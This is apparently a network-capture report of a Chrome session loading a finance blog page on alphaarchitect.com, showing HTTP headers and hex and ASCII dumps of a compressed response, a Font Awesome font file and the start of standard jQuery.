                                                                                                                                                                                                                                                                        2024-12-20 12:44:40 UTC1369INData Raw: ac 95 78 6f f7 96 4d d0 cd 0c 86 99 ee 14 ba 2e 31 a6 be b9 75 9b 64 48 ad 0c 9d ba 2c 97 e7 a4 ee 84 c5 9c 31 20 67 b0 99 a7 a6 6a 74 8f 34 5f 95 27 4d d8 98 52 b9 b7 ab e1 c4 76 f2 ed 2a 39 37 ec 64 02 72 b9 85 aa a2 b6 5c 46 12 ee 42 88 3f 4f 53 f1 84 51 8a 53 c0 95 22 b0 03 b6 73 b9 58 8b d8 7c b8 41 dc 3f 90 a3 c2 f5 d9 38 88 94 cd 0b 38 0a e3 72 f3 e9 ad f0 2c 1a e3 44 24 05 1a 74 0f 23 38 63 45 ab 5b 5a 93 07 92 9d 00 9c 3f 1f e7 9a f9 0a 83 79 75 18 5a e9 7a 3b 1c 67 1f 44 3a 48 c9 7f 5f 9e 32 17 42 33 a4 de d2 19 d0 69 af a6 b3 de 67 9b bc fa 30 4f 45 c1 55 41 c0 33 37 7e 60 94 18 11 e7 5c be db 65 86 df 85 57 17 8d b3 23 5c 1a 4e 49 46 62 9a d3 55 ec ff 9d d4 16 fb 22 36 5d cf 43 4f 41 a8 31 05 37 63 f4 dc cf 63 62 51 61 22 e3 81 c2 2f d3 f5 18
                                                                                                                                                                                                                                                                        Data Ascii: xoM.1udH,1 gjt4_'MRv*97dr\FB?OSQS"sX|A?88r,D$t#8cE[Z?yuZz;gD:H_2B3ig0OEUA37~`\eW#\NIFbU"6]COA17ccbQa"/
                                                                                                                                                                                                                                                                        2024-12-20 12:44:40 UTC1369INData Raw: 68 0b d4 c0 2e 49 6a be 01 43 a6 ba 6c b7 1a e2 11 fe 93 d4 8b 15 05 66 ec 43 a5 bc 28 0c 3e 59 d8 3a 10 e9 c3 b0 b9 4f b0 4f 85 7e 9d 54 52 ed 3d 95 8d 05 8e aa d0 1f f9 54 a5 a9 b8 40 55 e9 49 9e 54 9d 59 69 3d 55 af 3b fd 44 b5 60 66 05 d5 0a ce 66 aa 8d 7b de 80 3b 93 6d 0f ac 5d 95 fe 93 45 05 11 b0 48 0b 68 50 61 89 34 2a 69 f2 92 ca 36 f9 4f 55 58 12 de 54 a5 5d b1 84 aa 32 2f 3e 51 75 8e a5 50 aa de 9c 74 92 6a e1 9d 89 54 2b 6a 8e a6 da 04 e7 3c dc 69 d8 0e 59 bb 5e 8c 1f 6c 44 b2 13 e6 cd 16 6a 24 55 ec 23 a1 18 24 85 b4 11 0e 90 cc 7f e9 45 e8 62 e3 05 ff 1a 2a 21 75 54 5a ec 2b 8c a9 70 75 34 c2 ce c0 73 98 91 41 1d a9 e5 a9 0c a9 af c5 00 cd 8a 00 b0 0b 09 5f d7 a8 5a 18 53 c5 58 d4 30 4f 1c 6d 14 1a 7c 76 d6 62 28 26 dc 50 93 51 e0 ec 95 85
                                                                                                                                                                                                                                                                        Data Ascii: h.IjClfC(>Y:OO~TR=T@UITYi=U;D`ff{;m]EHhPa4*i6OUXT]2/>QuPtjT+j<iY^lDj$U#$Eb*!uTZ+pu4sA_ZSX0Om|vb(&PQ


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        3192.168.2.449744141.193.213.104435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:44:40 UTC843OUTGET /wp-content/themes/Avada/includes/lib/assets/fonts/fontawesome/webfonts/fa-solid-900.woff2 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                        Origin: https://alphaarchitect.com
                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: font
                                                                                                                                                                                                                                                                        Referer: https://alphaarchitect.com/2024/12/long-term-expected-returns/
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:44:40 UTC427INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:44:40 GMT
                                                                                                                                                                                                                                                                        Content-Type: font/woff2
                                                                                                                                                                                                                                                                        Content-Length: 78212
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Last-Modified: Thu, 24 Oct 2024 14:49:56 GMT
                                                                                                                                                                                                                                                                        ETag: "671a5e94-13184"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147798
                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fb9a1eecc0f79-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:44:40 UTC942INData Raw: 77 4f 46 32 00 01 00 00 00 01 31 84 00 0d 00 00 00 03 17 f4 00 01 31 2b 01 4b 85 e3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3f 46 46 54 4d 1c 1a 1e 06 60 00 99 4e 11 08 0a 8a e6 68 88 c3 42 01 36 02 24 03 9f 30 0b 9f 34 00 04 20 05 8a 2b 07 e2 2e 5b b4 75 92 80 70 d3 08 fa f5 66 55 05 59 20 fc 5e 0b a6 9b 3b 94 db 06 70 f2 67 f8 57 8f 95 8c 6d 19 c1 bb 1d 1c b6 df e5 2a b2 ff ff ff ff b7 25 0b b1 ad dd 49 3b 9b a7 c9 d2 58 50 b1 54 44 05 3d 3d ef 11 d2 2c c6 c4 cc 22 53 b5 e6 20 4a 34 d9 49 4e c2 aa 4d cd 4d fa dc 72 89 77 bd 2c 7b 5c 7b 85 07 55 6b ad 35 df cb 03 30 45 40 45 40 45 40 79 3c d6 fa 24 59 95 c0 75 4c 45 4a 71 df 2d 70 0a b2 e9 b4 16 bd 0d f4 ac 08 a8 8a 6a 29 e8 b4 c2 8a 8c 66 c8 8c 06 68 34 64 44 67 46 a2 68 62 46 86 f8
                                                                                                                                                                                                                                                                        Data Ascii: wOF211+K?FFTM`NhB6$04 +.[upfUY ^;pgWm*%I;XPTD==,"S J4INMMrw,{\{Uk50E@E@E@y<$YuLEJq-pj)fh4dDgFhbF
                                                                                                                                                                                                                                                                        2024-12-20 12:44:40 UTC1369INData Raw: 5b 7b f9 e7 cc 48 56 a0 60 56 e0 42 08 4a 78 51 b6 1e c2 f2 33 80 c1 8d 16 8a e1 a1 17 00 14 aa c6 42 ff 03 08 04 bc 7f f5 67 3f f3 f4 e3 8c 84 9b 8d 29 61 df c0 43 0d 42 c6 aa f6 70 7c 28 9a 3b ed cc 2f 9f 9e 08 36 9b 20 6f 0a 09 d8 f0 53 28 e3 5f 69 ea d7 5d be 75 ef e6 d7 dd 83 19 85 6f 2f 26 93 a2 83 22 15 7f cc c0 40 f4 5c 48 c1 fe d8 cc 83 0e 17 e0 0a ec de 10 26 30 68 bf 66 32 45 2a 51 a2 c8 09 0a 4e 41 01 c1 61 93 2c 97 b5 9b ef b5 d9 3b 6a 67 da 03 b6 8f 0d 07 64 a2 83 3d 7f 60 41 88 5d e5 5d d1 ee b6 9a fc 2e 88 b0 92 02 d4 a5 0c d3 c1 3e 4c 39 d8 01 ff 85 00 4d 9a d3 58 53 c0 e4 aa 3a e6 cf 48 a8 12 c4 7f dc 6f bf 14 4f c3 f7 10 6f f0 25 14 42 9a d8 b3 3b c3 42 20 06 18 c0 c1 90 3b 5b 1a e6 27 29 9b 4c ca 0e 40 88 b3 c5 1d d6 22 29 56 49 4d 53
                                                                                                                                                                                                                                                                        Data Ascii: [{HV`VBJxQ3Bg?)aCBp|(;/6 oS(_i]uo/&"@\H&0hf2E*QNAa,;jgd=`A]].>L9MXS:HoOo%B;B ;[')L@")VIMS
                                                                                                                                                                                                                                                                        2024-12-20 12:44:40 UTC1369INData Raw: 81 02 4f 4b ab 84 53 57 e1 1d a5 d8 c5 ec be 1e 4a 51 b9 38 b6 1a b1 86 b7 18 cb 2a e7 45 5f 42 be c4 49 f9 5f 8a ca 75 5f 16 7e 71 7c 59 fa 65 05 dd 89 de f2 ee 2f fd 5f be f9 72 fc cb 29 8c d9 17 bf 5c fb 32 31 fb e0 cb 4f c2 df 5f e1 90 82 de cc df 5e f0 b5 e5 eb 32 6e fc 8f a6 0b fc 3f ef 02 ef 00 6f 3b 92 5c 48 2f 6b 59 c9 b9 74 d2 ca 42 e6 32 93 28 b5 4c c4 cb 58 9c 58 31 32 14 25 67 02 27 c1 ff 3c fe 9f a7 dd 76 b3 9c 8e 86 83 7e b3 51 af 55 2b e5 62 21 9f 26 71 14 3e 5d 0e 07 fd 5e 27 9f cb 26 a3 a1 fb ed 7a 39 2e e6 b3 c9 a8 5e ab e4 73 89 68 f8 97 4a 15 32 a4 4b 95 2c 5e 4c 54 58 37 2a ca 6a 91 e4 bf 7f f9 a7 6f de b5 75 99 25 91 67 1b e0 72 f3 cc f4 e4 44 b7 9d bd 39 5e 6e d6 29 fa b2 80 6c 69 34 46 f7 e8 08 03 49 e4 39 4a 30 82 0f 77 b7 cb 61
                                                                                                                                                                                                                                                                        Data Ascii: OKSWJQ8*E_BI_u_~q|Ye/_r)\21O_^2n?o;\H/kYtB2(LXX12%g'<v~QU+b!&q>]^'&z9.^shJ2K,^LTX7*jou%grD9^n)li4FI9J0wa
                                                                                                                                                                                                                                                                        2024-12-20 12:44:40 UTC1369INData Raw: 79 d4 12 53 72 a1 2f 0b f3 64 e2 56 76 2d 41 b1 80 b8 9a b0 ea 0a 85 6a 15 00 9a f7 22 e7 67 53 55 f7 68 ae ad 31 c3 a2 f0 59 2b bf d7 7e ad d1 7e c6 72 94 9a a8 ce bd 38 a7 b5 6f 8c ce 30 23 67 23 8a f5 74 e3 bf 5c f5 ab 77 23 9b b4 67 fb b7 83 95 45 05 4c 08 46 91 a9 0b ed 55 13 bc 20 10 37 f5 64 d8 bf b1 36 4d 66 fd b8 c4 9f 13 b1 ba 94 ba b5 18 cb 8b aa 8a f8 84 20 29 2d 16 77 fd dd e4 c4 83 52 f9 d3 2a 66 b2 cb 2b 66 9c b8 e7 5b 56 5c 37 ec b7 2b 0e 5c 71 89 8f 01 b3 7e 50 4f c8 8f a2 4f c2 cb 15 a0 51 ea f1 e3 2b 5b 1d ef bd 16 1f cf e2 b2 e3 be 40 05 ae e8 ed 87 e3 c5 67 d7 4a a9 e3 ec 1a e6 bd 6a 5d 5e 38 cb 57 2a 8d c1 ce 4d ad 95 8e 88 20 1e d8 5b 17 3e 54 65 a6 30 3b 0b db 21 12 ab 95 8f d0 44 45 84 1e 6a 75 ef 42 0c bd bd 8e 15 70 bc ae 9b 21
                                                                                                                                                                                                                                                                        Data Ascii: ySr/dVv-Aj"gSUh1Y+~~r8o0#g#t\w#gELFU 7d6Mf )-wR*f+f[V\7+\q~POOQ+[@gJj]^8W*M [>Te0;!DEjuBp!
                                                                                                                                                                                                                                                                        2024-12-20 12:44:40 UTC1369INData Raw: cf 04 a3 c7 39 4f b3 44 bd 06 0e 27 31 f0 12 84 b4 fc ac 98 d4 ed 8d 89 45 36 2a 89 31 12 e6 04 88 26 a6 f5 31 d6 55 92 b9 e6 68 0c 9f 71 dd ca 6a f3 ba 67 92 88 ed 52 96 63 3b 38 4d 18 86 9d ea d6 d1 61 5a 62 9c 20 d8 67 0a cd 59 1d c0 5d b8 85 69 81 fe a2 c2 1c 31 ef 1d e5 da 22 d0 23 a4 03 6b 40 68 f6 23 fb cd 84 a6 3e 46 09 28 6f 1e 53 4f 6f 54 5e 28 52 be e1 30 62 51 65 1e 4a ec 70 5d 72 39 9d 4a 4b b5 24 5f 7c 6c bf 9b da 6a 28 e3 bb e8 67 99 44 21 a4 28 9d 46 c5 1d 95 35 97 91 64 e6 1d fc ce 19 9b 23 7b 62 45 6c 5b 03 bb 67 ea 9c a0 72 5f d2 05 6e 32 e9 e2 43 21 0a 64 32 87 83 01 5e 30 5d a5 2a 4b c4 26 87 cc 16 fb 58 84 3f 9f f6 a4 90 ae e3 94 cc f8 66 75 01 35 e6 b5 28 43 a0 fb e5 93 85 bc 3d 2f 18 38 45 8b 3d 04 3c 39 c9 9f 56 10 0e a4 76 fc 75
                                                                                                                                                                                                                                                                        Data Ascii: 9OD'1E6*1&1UhqjgRc;8MaZb gY]i1"#k@h#>F(oSOoT^(R0bQeJp]r9JK$_|lj(gD!(F5d#{bEl[gr_n2C!d2^0]*K&X?fu5(C=/8E=<9Vvu
                                                                                                                                                                                                                                                                        2024-12-20 12:44:40 UTC1369INData Raw: 8c 1b 2f 1b 3d de 2d 42 ae 07 0d 49 29 b5 27 76 7b 89 16 6b 21 e4 de 67 b1 24 5c 01 e1 4e 95 97 ac 4d 7b c3 d4 b2 b7 9b 09 92 bd 3b a5 4d 2f d3 c4 4a 09 f2 97 93 b9 27 85 c1 dd 85 db b9 f1 a2 9e 54 08 6f 14 ae 67 21 4f 8b 85 94 9f d6 d6 36 5b 84 34 cc 7b 21 65 06 ca 7d e5 10 92 6a 76 03 a3 c4 39 0f 3f d6 d1 45 f8 ed 18 49 3b 56 97 b2 25 05 1f dd d0 60 de 52 22 50 9a 4e 7d 72 55 54 f4 4b e4 e2 f7 14 23 fa f3 62 60 04 15 5e 93 64 6f d7 ab f4 4d ea a0 a3 d3 4e a3 79 2f ee 1f b8 b1 07 c3 bd 30 22 2b f6 38 0c ea 37 98 2f 37 bc 97 22 00 13 ba 01 1b 3e 05 69 34 35 6c 11 37 21 f2 69 7d cb 88 51 bd 95 d4 d5 62 6d ab cb ef e9 3f c8 ad b6 af eb 6f 94 56 97 3e d4 bf 5f 24 c5 6b a0 9b 6e bb 57 2c fa 32 11 4b 18 5f 26 3a 4f 0e 69 22 38 ba cd 82 4d b9 70 16 2c 51 2b 87
                                                                                                                                                                                                                                                                        Data Ascii: /=-BI)'v{k!g$\NM{;M/J'Tog!O6[4{!e}jv9?EI;V%`R"PN}rUTK#b`^doMNy/0"+87/7">i45l7!i}Qbm?oV>_$knW,2K_&:Oi"8Mp,Q+
                                                                                                                                                                                                                                                                        2024-12-20 12:44:40 UTC1369INData Raw: 16 32 e3 e5 12 bc e3 4d f1 25 33 91 d0 06 81 24 f9 0e d5 93 39 53 1e cb 7e e0 77 fc c3 45 a2 69 11 d2 6e a9 bb 78 58 54 d9 63 04 1e f5 5d f5 97 ef 31 1c 4b ec 43 60 98 37 31 21 46 54 ef 32 ca 26 b2 b2 94 0e dd d4 a1 8c 2f 5c 48 5d 2f cf f7 62 e9 2a 89 c4 10 1d 0e 50 e3 a7 d6 47 cc d2 11 e4 a1 c6 5d cd 24 98 08 26 a9 8a dd 40 a1 97 c2 6f 82 4d ec 90 5a 7d cc f3 9f b4 32 29 ca e4 b9 58 14 70 41 57 45 38 23 98 b7 bb 39 c1 08 14 86 78 2e 4c b9 3c c2 de 15 1a 0a 98 90 b6 0d 4e 9d e3 ac 17 84 35 b4 ab 5c 57 ce ae 94 a9 bb 7e a6 bb 85 25 36 ff ec 58 f2 2f 7c 50 3d d7 0d 89 32 50 00 44 4d 13 fa 3e 95 a8 36 bb ed 35 b5 c5 ee 16 32 de cd 5b 4e e1 b5 27 99 b4 ec e2 e3 72 be e2 f3 0f a7 50 d9 cc c1 47 25 26 7a 2e 75 6b d8 fc 8f f0 27 ef 4f 7e f6 e2 5f e7 ce 7c fe f4
                                                                                                                                                                                                                                                                        Data Ascii: 2M%3$9S~wEinxXTc]1KC`71!FT2&/\H]/b*PG]$&@oMZ}2)XpAWE8#9x.L<N5\W~%6X/|P=2PDM>652[N'rPG%&z.uk'O~_|
                                                                                                                                                                                                                                                                        2024-12-20 12:44:40 UTC1369INData Raw: c7 4b e2 e5 1f 55 be 90 4c 5a d4 ae a4 38 20 eb 2f e2 a2 ec 0a 6f 5d 45 43 9e d9 a2 26 99 d1 62 ee 8b 0b d9 30 83 05 93 83 62 2d 93 5f 13 01 96 41 c3 25 67 94 85 07 40 4f ef d9 6d 4b 85 6d b6 36 46 4c 24 1c e3 09 36 4b 67 e2 a5 3c 96 bd 2c 30 bf 3f ea 02 e5 2a 44 55 35 2a 73 37 9f 75 6c 1e 33 a3 0c ea 47 47 f9 cd 9c 71 93 16 bf 82 0e aa 2a 8a cb 0a a5 f9 14 68 17 94 14 ad 88 4f 28 86 17 f1 bd e3 9a 8c 84 1f 35 9b 34 c9 48 18 15 af 19 f2 e2 84 43 34 e2 61 5e 4e 92 32 92 95 a6 a5 e0 22 24 66 26 4c 92 60 1c 91 a6 85 3d d1 3d db 86 66 34 1c 34 4d ea d1 9c 99 d2 6a da de 7d e5 ae 7b 2a b5 e7 92 6b 4d 64 d8 e3 21 eb 00 4e ee d7 16 ad 83 e8 80 8a 1a b2 37 ab 5e 18 f4 74 78 1d da ea bd f6 83 99 30 57 0c cb b8 68 4f ac 32 9b 4d 8a 76 72 18 3b 01 98 10 24 bc af cf
                                                                                                                                                                                                                                                                        Data Ascii: KULZ8 /o]EC&b0b-_A%g@OmKm6FL$6Kg<,0?*DU5*s7ul3GGq*hO(54HC4a^N2"$f&L`==f44Mj}{*kMd!N7^tx0WhO2Mvr;$
                                                                                                                                                                                                                                                                        2024-12-20 12:44:40 UTC1369INData Raw: fa 94 6d 28 46 f7 8d dc 0c fd bc 07 e5 c5 66 36 16 8b fb d1 a8 53 af 1f 83 89 13 f2 98 47 28 b4 e2 70 e3 a3 a8 03 53 74 b5 6b ea cb 7f e1 d9 f2 33 f3 48 26 91 fc 87 b8 23 d1 91 67 f2 9b 1e f3 73 58 2f ec 4f ae e9 3f 61 aa 6c 74 60 db 3e 23 5a 2e 7b c6 09 6e 09 dd 80 3f b7 e7 78 bd 2d f6 fe 33 2b 6b ce 4b 5b 84 d4 a4 3b 97 0c 2d a6 50 cf 68 af b3 11 7a f5 d5 9b a5 0b fb 63 5a 2a f8 3b ec f1 42 6a d3 07 6b 31 e9 8f 47 ff 92 54 e1 fd 61 65 f8 c1 88 28 81 c3 e3 cd c8 14 f5 f9 c3 ca 4b ba fa 72 fb cf f6 f9 a3 ea f0 27 ca 8b 87 d5 a5 1f 29 af e5 95 97 8e 28 ed 8f d5 17 8e 29 2f 9d 54 d7 0e ab ab 7a 49 08 2e 19 6f 58 d9 cc dd bd 4b 88 51 c9 ae c3 d1 5f 54 48 b4 49 26 59 14 2a 54 0d 8c 73 1e 13 29 b1 a1 81 f4 62 d4 af 4a 7f e0 be f3 50 d0 e3 08 25 e1 7a ed 72 99
                                                                                                                                                                                                                                                                        Data Ascii: m(Ff6SG(pStk3H&#gsX/O?alt`>#Z.{n?x-3+kK[;-PhzcZ*;Bjk1GTae(Kr')()/TzI.oXKQ_THI&Y*Ts)bJP%zr
                                                                                                                                                                                                                                                                        2024-12-20 12:44:40 UTC1369INData Raw: 1e 60 a7 f9 8a 55 ae 15 5a 63 15 38 b9 1e 82 68 c5 d8 76 48 6c 8b fb 6b 61 ba 78 05 08 ba 67 83 94 1a 04 b3 67 f3 a1 75 d7 68 07 9d 1f e0 f6 c0 12 c3 19 b7 0f 31 39 c6 eb 04 53 66 83 68 4f b7 fc 40 20 a2 b0 f5 bf e1 0a 0c 88 de c1 da 08 10 04 cd 8b 83 a6 75 72 ec e8 75 a0 25 78 47 bd 0c 4b 54 5d 94 d3 c6 92 b9 21 1f be 05 db 1f 89 4c 22 fd d2 ab 74 ce 87 18 d0 a8 9c 30 f7 67 af b6 13 b0 9f 64 8a 7b f4 6f ca e4 31 de 32 f8 d6 27 ae 8e 18 27 8f 54 52 4f ff 98 25 b8 f3 80 4e bf 62 1e 7f 8b f9 00 d0 f3 e1 bb db ef 21 12 e8 26 46 f5 46 ff dc 2b 5b 14 f6 b3 f7 df db 89 4a 5a cb 6a 4d 49 af af 29 1c a5 5e 7e 2e 6f 6d cf 73 82 a0 4b 77 1a aa f8 56 f3 5c 94 57 96 8a 0a ff 7e d4 f6 d1 be c5 0a 4a d7 f6 38 6e 54 f8 dd 39 ad a2 e2 fc 11 c3 b2 45 12 d0 c8 c0 f8 2b 66
                                                                                                                                                                                                                                                                        Data Ascii: `UZc8hvHlkaxgguh19SfhO@ uru%xGKT]!L"t0gd{o12''TRO%Nb!&FF+[JZjMI)^~.omsKwV\W~J8nT9E+f


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        4192.168.2.449749141.193.213.104435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:44:40 UTC768OUTGET /wp-includes/js/jquery/jquery.min.js?ver=3.7.1 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                        Referer: https://alphaarchitect.com/2024/12/long-term-expected-returns/
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:44:41 UTC493INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:44:40 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Thu, 14 Nov 2024 00:24:52 GMT
                                                                                                                                                                                                                                                                        ETag: W/"67354354-15601"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147798
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fb9a40cff42da-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:44:41 UTC876INData Raw: 37 64 63 33 0d 0a 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 37 2e 31 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f
                                                                                                                                                                                                                                                                        Data Ascii: 7dc3/*! jQuery v3.7.1 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Erro
                                                                                                                                                                                                                                                                        2024-12-20 12:44:41 UTC1369INData Raw: 3b 69 66 28 6f 2e 74 65 78 74 3d 65 2c 74 29 66 6f 72 28 72 20 69 6e 20 75 29 28 69 3d 74 5b 72 5d 7c 7c 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 26 26 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 72 29 29 26 26 6f 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 72 2c 69 29 3b 6e 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 6f 29 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 6f 29 7d 66 75 6e 63 74 69 6f 6e 20 78 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 65 2b 22 22 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 65 3f 6e 5b 69 2e 63 61 6c 6c 28 65 29 5d 7c 7c 22 6f 62 6a 65 63 74 22 3a 74 79 70 65 6f 66 20 65 7d 76 61 72 20 74 3d 22 33 2e
                                                                                                                                                                                                                                                                        Data Ascii: ;if(o.text=e,t)for(r in u)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function x(e){return null==e?e+"":"object"==typeof e||"function"==typeof e?n[i.call(e)]||"object":typeof e}var t="3.
                                                                                                                                                                                                                                                                        2024-12-20 12:44:41 UTC1369INData Raw: 70 75 73 68 3a 73 2c 73 6f 72 74 3a 6f 65 2e 73 6f 72 74 2c 73 70 6c 69 63 65 3a 6f 65 2e 73 70 6c 69 63 65 7d 2c 63 65 2e 65 78 74 65 6e 64 3d 63 65 2e 66 6e 2e 65 78 74 65 6e 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 2c 74 2c 6e 2c 72 2c 69 2c 6f 2c 61 3d 61 72 67 75 6d 65 6e 74 73 5b 30 5d 7c 7c 7b 7d 2c 73 3d 31 2c 75 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 2c 6c 3d 21 31 3b 66 6f 72 28 22 62 6f 6f 6c 65 61 6e 22 3d 3d 74 79 70 65 6f 66 20 61 26 26 28 6c 3d 61 2c 61 3d 61 72 67 75 6d 65 6e 74 73 5b 73 5d 7c 7c 7b 7d 2c 73 2b 2b 29 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 61 7c 7c 76 28 61 29 7c 7c 28 61 3d 7b 7d 29 2c 73 3d 3d 3d 75 26 26 28 61 3d 74 68 69 73 2c 73 2d 2d 29 3b 73 3c 75 3b 73 2b 2b 29 69 66 28 6e 75
                                                                                                                                                                                                                                                                        Data Ascii: push:s,sort:oe.sort,splice:oe.splice},ce.extend=ce.fn.extend=function(){var e,t,n,r,i,o,a=arguments[0]||{},s=1,u=arguments.length,l=!1;for("boolean"==typeof a&&(l=a,a=arguments[s]||{},s++),"object"==typeof a||v(a)||(a={}),s===u&&(a=this,s--);s<u;s++)if(nu
